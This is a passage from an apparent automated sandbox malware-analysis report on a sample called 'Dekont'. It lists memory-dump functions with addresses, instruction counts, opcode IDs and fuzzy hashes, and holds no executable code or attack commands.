                                  • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                  • Instruction Fuzzy Hash: 84F0FC33A046739BC73256595D42F2BB9958FC1B64F29403DF10D9B204CA648C02B7D0
                                  Function 0100CA6F Relevance: .0, Instructions: 42COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                  • Instruction ID: 621234f353a0b84c728d1676cadb5949cc01fc74cc804dc53f3db2fa3a9a5c22
                                  • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                  • Instruction Fuzzy Hash: D901F9716006889BF333976DC949F5ABBD8EF82754F0885F6FA848B692DB78C940C210
                                  Function 010A61E5 Relevance: .0, Instructions: 41COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f7bf6eb9bda1585d87d7e63eb8c26817a0445240982c6f4be9cad0e50107ddb1
                                  • Instruction ID: a559b1af39a3700d7c3183e4d2858c9448acab3bd7553920a87fa68da52a4cf5
                                  • Opcode Fuzzy Hash: f7bf6eb9bda1585d87d7e63eb8c26817a0445240982c6f4be9cad0e50107ddb1
                                  • Instruction Fuzzy Hash: EE017C71A0024D9BCB00DFA9D845AEEBBF8AF48310F14405AF540AB380D738AA01CB94
                                  Function 010563C0 Relevance: .0, Instructions: 41COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                  • Instruction ID: 145785d3771c97c4364dac03e22b468fff19228e6943359bbf1b0674c058b500
                                  • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                  • Instruction Fuzzy Hash: 32F01D7220001DBFEF019F94DD81DAF7BBEEF59398B104125FA11A2160D636DE21ABA0
                                  Function 0105A4B0 Relevance: .0, Instructions: 40COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0419c4ba73b5bc60232ed9ed765995de7dd2b570083adedbf6285377294efcca
                                  • Instruction ID: cab64052de40fc49853f1b3acfe6c31c550423586058edbe90858668969da5f6
                                  • Opcode Fuzzy Hash: 0419c4ba73b5bc60232ed9ed765995de7dd2b570083adedbf6285377294efcca
                                  • Instruction Fuzzy Hash: D001783A200109EBCF129F84D840EDA3FA6FB4C654F058201FE5866220C736D960EF81
                                  Function 00FCC0F0 Relevance: .0, Instructions: 39COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 003b916c6a15372784122c9a7d5f4692b5c9220f384d5c059335b51ecc11ac07
                                  • Instruction ID: 5b99714241e568733716f6159df8c89466a31c5e00e7c3fc9dc1d53f446608f3
                                  • Opcode Fuzzy Hash: 003b916c6a15372784122c9a7d5f4692b5c9220f384d5c059335b51ecc11ac07
                                  • Instruction Fuzzy Hash: 23F09672B543025FE754A6169D02F623296D7D1761F2D806EEA098B292E971DC01A2D4
                                  Function 0100656A Relevance: .0, Instructions: 39COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7b9fc2349312f830e295d3c8bfe18ce83c38f7e0f13265335f80a2c17f1b820b
                                  • Instruction ID: f5d4172a08a735c5e363f5f17028a848053b40bf630d7f518d74b1412769647e
                                  • Opcode Fuzzy Hash: 7b9fc2349312f830e295d3c8bfe18ce83c38f7e0f13265335f80a2c17f1b820b
                                  • Instruction Fuzzy Hash: F801A4B03007C59FF3739B2CCD88B2937E5AB40B05F4841E0BA81DB6D6EB2ED4018610
                                  Function 0107437C Relevance: .0, Instructions: 37COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                  • Instruction ID: 44e9e860371dd77264a97a632c364ca0dcff5d1ee62166b7ac9b6c3bbf9757c9
                                  • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                  • Instruction Fuzzy Hash: D0F02535B41D5347E7B5762D8460B3E75D55F90E10B05857C56C9D75C0DF20DC00C794
                                  Function 0105E872 Relevance: .0, Instructions: 36COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                  • Instruction ID: abc5bb651a2ee2bc24f785e680e487b528962cab3f0e429a1315c2ab69e046e4
                                  • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                  • Instruction Fuzzy Hash: 1CF054327155519BD3A19A4DDC80F27F7E8EFC5A60F6900B5AA899B660C760ED0187D0
                                  Function 0105C89D Relevance: .0, Instructions: 36COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 89d8b8f58a0e2b43f764b4b01630fe64de62bab0b4a902745b30e25877125201
                                  • Instruction ID: 1b4f2245183eca76d871186cac3453556c34472d3acce74ff061f44d0dd05cf9
                                  • Opcode Fuzzy Hash: 89d8b8f58a0e2b43f764b4b01630fe64de62bab0b4a902745b30e25877125201
                                  • Instruction Fuzzy Hash: 78F0A4706053489FD350EF28C946A1BB7E8FF98710F40465ABCD4DB394E638E900C756
                                  Function 01000854 Relevance: .0, Instructions: 35COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                  • Instruction ID: f47f0044fb446f41bb6094f4fb4c78a210e2522f8e39fce05be4baaf7323cf8a
                                  • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                  • Instruction Fuzzy Hash: 1FF02472600200AFF315DB21CC05F56B6E9FF99340F148078A584C71A4FAB0DE01D754
                                  Function 01058D20 Relevance: .0, Instructions: 35COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9e2804fb6505c7edb91138f3c38aaa34e43980f03c20daa7fec3a0658de173ea
                                  • Instruction ID: d0da192d05cb2a32a7429305db8d2675c0b44fb330d0cdf8d7517656f34b5a3f
                                  • Opcode Fuzzy Hash: 9e2804fb6505c7edb91138f3c38aaa34e43980f03c20daa7fec3a0658de173ea
                                  • Instruction Fuzzy Hash: D2F090366002446FE7A17B1DEC48B5BFBDAFB95720F49445AFDC52722287396C80DEA0
                                  Function 0105C912 Relevance: .0, Instructions: 34COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 993ebd9207c613fc1de48fd9da57b197410ba501a040025762843adafbbcab81
                                  • Instruction ID: 5adc30d841c3782179b956eebc50d708c0562515d0c77aa7b62d155e69c2af27
                                  • Opcode Fuzzy Hash: 993ebd9207c613fc1de48fd9da57b197410ba501a040025762843adafbbcab81
                                  • Instruction Fuzzy Hash: 94F06270A0124DDFDB54EF69C615A9EB7F8FF58300F008055B995EB395DA38EA01CB50
                                  Function 00FD47FB Relevance: .0, Instructions: 33COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3e54dd80e5ab0047191ab33ed69d8f3323291e3f7e053d2ed49decb4586658ae
                                  • Instruction ID: 3be844a27eab5897e619503831d0e38c6c773ce855ae13e1c25e5cc24ac0209f
                                  • Opcode Fuzzy Hash: 3e54dd80e5ab0047191ab33ed69d8f3323291e3f7e053d2ed49decb4586658ae
                                  • Instruction Fuzzy Hash: 16F06732D166E09FD722AA688448B62B796AB11BB0F1D896BD499C7602C774EC80F650
                                  Function 01090115 Relevance: .0, Instructions: 32COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ce9bbeb31cd154fea679f7d2b218d9a95ae6e9bdffce844ce99cd8390e3c0bfc
                                  • Instruction ID: 9dbb44457818b8b1be06b03c0e03735ab83630b03621c3693d2acc61df11b286
                                  • Opcode Fuzzy Hash: ce9bbeb31cd154fea679f7d2b218d9a95ae6e9bdffce844ce99cd8390e3c0bfc
                                  • Instruction Fuzzy Hash: 21F027B64196850ACFB26B3CA4702D13FACE741510F0910C9E4E09730ACA7B8483DB20
                                  Function 0100C5ED Relevance: .0, Instructions: 31COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e1a95d2424d9cfc0987182857d296d221008a46831338cca530d2aa5888c1066
                                  • Instruction ID: 88859855ef5962d95f1bdd9f0ac86a547d9f4ea4fad07f3f3a0d04c51fb1036a
                                  • Opcode Fuzzy Hash: e1a95d2424d9cfc0987182857d296d221008a46831338cca530d2aa5888c1066
                                  • Instruction Fuzzy Hash: 25F02E714026809BF3B3869CCA08B517BE8AB097A0F0C96E1D982C3182C260E880CA40
                                  Function 01012619 Relevance: .0, Instructions: 31COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                  • Instruction ID: 27bb5e9a13652fd0248ef7aed1acd1429c30293e5591a53bcf8b4c3faae00f3d
                                  • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                  • Instruction Fuzzy Hash: 73E0C032300A002BE3129F09CCC0F4377AEDFC6B10F00047DB5005F282C9EACC0882A0
                                  Function 01066030 Relevance: .0, Instructions: 29COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                  • Instruction ID: 506b130dab5be763796f69abdcf470ce2470c4e266f444e5e49175cb9639361f
                                  • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                  • Instruction Fuzzy Hash: D0F01C72104604AFF3218F0AD944B57BBFCEB05764F558065F6499B561D37AEC40CBA4
                                  Function 00FD0710 Relevance: .0, Instructions: 28COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                  • Instruction ID: 385e1077b4b7f09f758b95391cf79fcaacd7975c2fac2def22ff9044c91325ff
                                  • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                  • Instruction Fuzzy Hash: 8AF0E53A2043549BDB16EF19D440BD57BE5EB51350F140095F8968F351EB31F982DB90
                                  Function 010049D0 Relevance: .0, Instructions: 28COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                  • Instruction ID: 0b5a344681071f6dbaac19b95808ab5d967454a1186fe71d3c8685d360d1b0da
                                  • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                  • Instruction Fuzzy Hash: EFE0D832244585ABE7232A59CC00B6A77E5DBD27A0F150429E780CB1D0DB74DCC0D7DC
                                  Function 0107678E Relevance: .0, Instructions: 27COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                  • Instruction ID: fa2fe1c4db95f8c400afddbdec4081001c1edf71bdfad864fcfd6534cb2322ae
                                  • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                  • Instruction Fuzzy Hash: 89E0DF32A00510BBEB22A7998D02F9ABEADEB90FA0F050055B601E70D0E531DE04D6A0
                                  Function 0040E461 Relevance: .0, Instructions: 24COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_Dekont.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 56c62ff1eda09e1bdf6d44cc4d7fdc403d6bb65d3d6684610e16e318f6b2dfdd
                                  • Instruction ID: df5b5b946206354c393f7c52451566b8d0a2d0d04488327835fce837b35bb8f7
                                  • Opcode Fuzzy Hash: 56c62ff1eda09e1bdf6d44cc4d7fdc403d6bb65d3d6684610e16e318f6b2dfdd
                                  • Instruction Fuzzy Hash: 6FD0C25AB8A05195861A9A1D6CA08A1E72984C3670B1023E8DC98DB781D311C02182B9
                                  Function 00FD25E0 Relevance: .0, Instructions: 23COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: b047f4f83e1eb87b1a84b0e5bf8f21a506deba256640338e45d7b02ffb6432eb
                                  • Instruction ID: af01d30f6e15b0ccff43a5ebeba85ca83c13e8628aa6ad4e9aa29b579accbf6f
                                  • Opcode Fuzzy Hash: b047f4f83e1eb87b1a84b0e5bf8f21a506deba256640338e45d7b02ffb6432eb
                                  • Instruction Fuzzy Hash: 46E022320006809BC321FB2ADC02F8B77AAEF60360F100115B05557291CB38A800C7C4
                                  Function 01054000 Relevance: .0, Instructions: 22COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                  • Instruction ID: 0b79e146be5866bf22df54b0fa21daf4645f2822d7d8e62cd6da074a07056b70
                                  • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                  • Instruction Fuzzy Hash: 1EE0C9343003058FE795CF19C044B937BF6BFD5610F28D0A8A9888F205EB32E882CB40
                                  Function 0100CA38 Relevance: .0, Instructions: 22COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fadf0930fe88bdae2d9b33950088507e3f5344aac545660a2bd45cbbd8b45db9
                                  • Instruction ID: d7d695ddf5286298b2d85ede9317357e7ae6301349b9737993ed19936e6506c8
                                  • Opcode Fuzzy Hash: fadf0930fe88bdae2d9b33950088507e3f5344aac545660a2bd45cbbd8b45db9
                                  • Instruction Fuzzy Hash: E8D02B324814606EFB77E219BD04FE73A999B41724F0548E0F148D20A2D51CCCC196D4
                                  Function 00FC823B Relevance: .0, Instructions: 21COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                  • Instruction ID: 2b48a029d15a345ea1f7bafcd4069f394b57cf7b821576de2127df4e9057ecaf
                                  • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                  • Instruction Fuzzy Hash: 8CE08632400521DED7312E15DD09FD176A1FB94B50F30486DE081160688A759C82FA44
                                  Function 00FC8C8D Relevance: .0, Instructions: 21COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e11a57143702242364d2b83303e293bdba6231e0197df2e73aa18f92c330474f
                                  • Instruction ID: 91bfe4f6df0fda7b29510e60d324e00f0fe7b5edb3831a7bbb3a54d466ec3c2f
                                  • Opcode Fuzzy Hash: e11a57143702242364d2b83303e293bdba6231e0197df2e73aa18f92c330474f
                                  • Instruction Fuzzy Hash: C5E08631401621DED731AF16EE05F9276A1BB50760F20446DE046164A08A749C86E655
                                  Function 00FD2050 Relevance: .0, Instructions: 20COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d91d9e487480c871e9eedc6c5b9435b345d18009c725df8d22f0474d68c27857
                                  • Instruction ID: 0d51edd9d1a73e48ddb2bb3ff5229c8347bbad0369c3c3555ada72661d5b0004
                                  • Opcode Fuzzy Hash: d91d9e487480c871e9eedc6c5b9435b345d18009c725df8d22f0474d68c27857
                                  • Instruction Fuzzy Hash: 82E08C321005906BC221FB5EED12E5A739AEFA4360F140222B15197295CA29ED00D794
                                  Function 01008A90 Relevance: .0, Instructions: 20COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                  • Instruction ID: bfc5b102971535bf7abbb948c74ce918e7642f8600471cebc8d45c115098e7ba
                                  • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                  • Instruction Fuzzy Hash: F6E08633511A1487D729DE18D511B7677E4FF45720F09863EA653477C1C634E544C794
                                  Function 01026AA4 Relevance: .0, Instructions: 17COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                  • Instruction ID: e44fc0c7403963e3a379c1f333d3b85c061221a641f9589d4198857513c45f0e
                                  • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                  • Instruction Fuzzy Hash: DAD05E36511A50AFC3329F1BEE04D13BBF9FBC4B10705066FE54683920C671E806DBA0
                                  Function 0100E59C Relevance: .0, Instructions: 16COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                  • Instruction ID: cec3ec74f900a52bc10832382d9a11b935c60986c5a4236728a48b2b3b79d5d0
                                  • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                  • Instruction Fuzzy Hash: ADD0A932204A60ABD772AA1CFC08FC333E8AB88724F1604A9B009C7051C364EC81CA84
                                  Function 0104E908 Relevance: .0, Instructions: 16COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                  • Instruction ID: e2f73fbc7c321d6a3bb0c2ee39195b585ba3beaa2b1ad236ae0b1b34f4c3fff9
                                  • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                  • Instruction Fuzzy Hash: 7CE08C75900680ABCF52EF59CA84F4ABBF5BB84B00F180498A1486B661C228ED00DB40
                                  Function 00FCA0E3 Relevance: .0, Instructions: 15COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                  • Instruction ID: 208f1a26385a2e06d591bfb675aa7fd4f0876844a0a346ef3cfefde51f152afd
                                  • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                  • Instruction Fuzzy Hash: 47D0223321607193CB2856656E08F6379059B80BA8F2A006C340BA3800C0088C42F6E0
                                  Function 0100A830 Relevance: .0, Instructions: 14COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                  • Instruction ID: 47902786c9a8756b1a45bfc0605a71a4857d0808dbdff43c1e84237faa17311e
                                  • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
